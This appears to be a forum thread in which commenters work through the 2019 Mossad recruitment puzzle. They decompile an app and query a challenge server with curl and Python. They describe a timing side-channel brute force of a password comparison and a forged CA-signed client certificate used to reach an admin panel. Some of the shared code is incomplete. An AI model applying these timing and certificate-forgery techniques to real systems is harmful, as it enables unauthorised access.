You're close, but that first endpoint is just to retrieve the auth URL, no need to post anything to it. It then passes the seed and password to the returned URL, so:
"http://35.246.158.51:8070/auth/v2" gets '{"Seed": "xxx", "Password": "xxx"}' of some kind
I haven't yet figured out what those are though...
See:
Future<Token> login(String seed, String password) {
var headers = new Map<String,String>();
return _netUtil.get(LOGIN_URL, headers:headers).then((dynamic authUrl) {
try {
if (authUrl == null) {
return Future<Token>.sync(() => new Token("", false, 0));
}
var loginUrl = BASE_URL + AuthURL.map(json.decode(authUrl.body)).url;
So reading about flutter, there's quick reload information in debug mode[0]
This leads me to believe that the seed and password entered in development / in the cookie jar from a previous attempt are somewhere in the `isolate_snapshot_data` file
replacing the original url with http://35.246.158.51:8070/auth/v2 and then sending a json like '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' with "Content-Type: application/json" returns {"IsValid":false,"LockURL":"","Time":136764}
the Time here (as per my understanding in the code) is the request duration, which somehow contradicts postman's request duration field
now one weird thing I've noticed about this app is this, if i install it on a regular device, and connect that to a proxy, then type gibberish into the fields then click Login, the following code gets invoked
void _submit() async {
final form = formKey.currentState;
if (form.validate()) {
setState(() => _isLoading = true);
form.save();
_networkActions.login(_seed, _password)
.then((result) => _loginCompleted(result))
.catchError((e) {
_loginCompleted(new Token("", false, 0));
});
}
if a loading icon appears then I assume that the code passed the condition and passed this line of code "setState(() => _isLoading = true);" now the weird part is that, I don't see any outgoing connections from the app... (I use charles to capture requests)
It's normal that you don't see any traffic using Charles, since Charles can only intercept traffic made by HttpUrlConnection or OkHttp, since flutter is not using any of those two..you can't see anything in Charles.
What do you do if they have sandbox escapes you don't know about? The kind of person that runs it in a VM is someone they'd probably want to be looking at.
THIS IS LEGITIMATE.
The Israeli Mossad had a ad today, https://www.algemeiner.com/2019/05/09/mossad-marks-israeli-i...
with a picture.
The picture has 4 rows of trophies, which should be converted to 4 numbers using binary --> decimal.
Those four numbers are 35, 246, 158, 51.
As an ip address, 35.246.158.51 leads to the site OP posted.
The challenges usually involve static analysis / disassembly, breaking improperly configured crypto, etc. The best part (for me at least) is that competitors must submit a write-up of how they cracked the challenge, and the best write-ups are published. It makes for fascinating reading even if you’re not really into that scene.
on page 397 there is entry in index:
iWalk, v2 71
on the same page there are interesting terms like
islamic terrorism, jihad via internet, judism...
also page number 71 which stands next to iWalk term is interesting coincidence since this riddle is celebrating 71 years of Israel independence...
jQuery is still a valid way to manipulate the DOM. There’s nothing wrong with doing that, especially if you already need to load jQuery for something else. I don’t think this is what the comment was referring to.
If I need to read the source code of a fucking website for it to be useful, then it's either a really special edge-case or the designer is a moron. Guess which case this is.
Why not upload a plain text file in the first place?
Oh, come on. You have to have an old phone lying around to factory reset for shits and giggles. Not like they'd burn good zero days on a publicity stunt.
Remember, this thing'll be getting picked apart by everybody considering the source.
Unless you're afraid of getting black bagged that i...<SIGNAL LOST>
Yes, and those people might visit a website, which asks for...shudder...cookies. If you can show that the cookies do something nefarious, I'd be interested. Do you think they general population would even get to the point of installing an APK?
"Consider what that means for Mossad"
At this point, you can't even prove that the APK does anything nefarious - and it would be dangerous for the Mossad if it did, because the challenge is literally to decompile the APK.
Level 5: You've downloaded Droid4X extra because of it, installed Java and everything and then you come back on HN to look if somebody is already on the next challenge (in order to save time) and then you start again, but with the new challenge :)
First Challenge Solution:
Mossad 2019 Challenge Start: https://r-u-ready-4.it/ Every line in the image is binary 8-bit number that will give you an ip address : 35.246.158.51
Download app.apk from http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk Remember your Client ID - mine is 854279b4c89e4b5c9722352c3f9f1d6c You will user it as "Seeder" property in the app //////////////////////////////////////////////////////////////////////////////////////////////// using WireShark (or any other packet snipper) we can see that the login button does this:
POST /auth/v2 HTTP/1.1si user-agent: iWalk-v2 content-type: application/json; charset=utf-8 accept-encoding: gzip content-length: 29 host: 35.246.158.51:8070 {"Seed":"admin","Password":"admin "}HTTP/1.1 200 OK Content-Type: application/json Date: Wed, 08 May 2019 21:49:05 GMT Content-Length: 47
Using http://www.javadecompilers.com/, i Decompiled the apk, and got a lock at the Manifest < <xml version="1.0" encoding="utf-8" ....... <activity android:configChanges="density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize" android:hardwareAccelerated="true" android:launchMode="singleTop" android:name="com.iwalk.locksmither.MainActivity" .... .....
The line "look for us on github.com" got my attention, so i looked for iwalk.locksmither in github and found "iwalk-locksmithers" linke: https://github.com/iwalk-locksmithers-app the server source code was there. In the code, there are a few comments that can help
the part of "for currentIndex < len(lock.Password) && currentIndex < len(loginData.Password) { if lock.Password[currentIndex] != loginData.Password[currentIndex] { break } //OG: securing against bruteforce attempts... ;-) time.Sleep(30 * time.Millisecond) currentIndex++ }"
the securing aginst bruteforce (tyring all combinations) is the weeknes. The idea behind for hacking the password is to try only one char at first. if we get a 30ms dealy, it means we got the 1st char right, so then we can check the next one, so we will try 2 chars (the 1st we know, the second we will guess) if we will get 60 ms +- dealy then we got th 2nd char and we will try the third one, and again and again, until we will get the password.
To solve it, it wrote a simple c# code that does in a loop http push to the server every time we try to add a new char to the password, and if we got a dealy that is +- 30ms more then the last try, we add that char our final password the uri is http://35.246.158.51:8070/auth/v1_1 and user agent is ed9ae2c0-9b15-4556-a393-23d500675d4b (as writen in the server) I did some avg calcs of the dealys The password length is 32 with hexa char (didnt know that until i guessed the password) we can know that the password is correct when we get back "IsValid":true" *Time we get is in nano Seconds and not ms
After I enterd the pasword and cliend id, i got a link for a token and a linke for challenge 2
Not sure I understand the bruthforce code.
I'm trying to get the first char.
I've written something along
import requests
import string
#a-zA-Z!@#$%^&*()_-=
printables_chars = string.printable
agent = 'ed9ae2c0-9b15-4556-a393-23d500675d4b'
for i, char in enumerate(printables_chars):
print('run {}. char {}'.format(i,char))
result = requests.post('http://35.246.158.51:8070/auth/v1_1',
data={"Seed": "d14236b60e0f4aef94499cb648a5f522", "Password": char})
if(result.json()['Time'] > 100000000):
# This prints randomly for some cases and others doesn't
print(result.json()['Time'])
res = check(CHARACTERS)
for i in range(10):
res = check(res)
print(res)
DISCOVERED_PASSWORD += res[0]
print("FOUND ONE MORE! {}".format(DISCOVERED_PASSWORD))
But I got some progress:
1. Image leads to subdomain: http://dev.missilesys.com/
2. It generates p12 certificate for login to admin-panel. You should enter username/password, submit the form and click download. (It there is no download button just try something like this: refresh the page, change method from POST to GET, enter credentials and press Submit, after that press submit again it'll appear)
3. Add certificate to KeyChain (on macOS) and go to missilesys.com.
4. You're got into admin-panel, but you have no permissions to shutdown it. You need to be an administrator.
5. You should get .p12 certificate for administrator, but you can't because "User alreay exists!". This's place where I'm stuck.
It would be great if you have an idea how to handle with it :)
As I check:You need to input administrator inside login without pass in browser Preserve log mode and jAvAsCrIpT generate it by login name check Headers Form Data private key .I think I am on the way but now I need password from cert of Admin now:))
I have an idea, but don't have the time to check :-/
Using online CSR generator I succeeded to sign a CA certificate.. So maybe we can use the signed certificate to sign another certificate for admin user on behalf of the root certificate?
1. I created CSR with CA:TRUE and send it to the server.
2. The server signed it and returned me a certificate.
3. I use the given certificated with CA:TRUE from the server and sign a new certificate with the username administrator.
4. I install the certificate on my browser and should get in.
All of the above sounds great. however, it is still(!!!) not working for me.
Where am I going wrong
Can you explain step by step how you have done it? :)
If you change to CSR and key in the request to self-generated, it still says username already exists.
on the other side, if I create my own certificate using custom CSR and key, I still cannot sign it with website CA (taken from original p12 file) since I do not have the private key.
Poke around and you'll find code for POSTing JSON-encoded credentials to http://35.246.158.51:8070/auth/getUrl. (Grep for the IP to find it.)
So, using the web site name as the seed and the 'client id' as the password, we get:
$ curl -X POST -H "Content-Type: application/json" -d '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' http://35.246.158.51:8070/auth/getUrl
The response is an HTTP 200 and: {"AuthURL":"/auth/v2"}
http://35.246.158.51:8070/auth/v2 is I guess the next step.
edit: The /auth/getUrl endpoint responds to any request with the same response, so that may not be the right Seed/Password combination.